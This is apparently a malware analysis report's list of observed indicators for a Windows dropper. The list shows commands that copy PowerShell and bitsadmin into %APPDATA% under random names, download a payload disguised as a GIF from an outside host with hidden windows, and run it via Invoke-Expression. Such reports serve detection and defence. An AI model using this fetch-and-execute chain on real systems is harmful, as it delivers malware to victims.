Technical Information
- '%APPDATA%\cwibdyu.exe' /transfer UaWyyt /download https://nvcssllc.com/nalsica/CHNDRN67R48F904O/blank.gif %APPDATA%\blank.gif
- '%APPDATA%\zcwibdyu.exe' -c &{$qZ=gc %APPDATA%\blank.gif| Out-String; Invoke-Expression $qZ }
- %APPDATA%\zcwibdyu.exe
- %APPDATA%\cwibdyu.exe
- 'nv###llc.com':443
- DNS ASK nv###llc.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zcWiBDyU.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\cWiBDyU.exe' (with hidden window)
- '%APPDATA%\cwibdyu.exe' /transfer UaWyyt /download https://nvcssllc.com/nalsica/CHNDRN67R48F904O/blank.gif %APPDATA%\blank.gif' (with hidden window)
- '%APPDATA%\zcwibdyu.exe' -c &{$qZ=gc %APPDATA%\blank.gif| Out-String; Invoke-Expression $qZ }' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zcWiBDyU.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\cWiBDyU.exe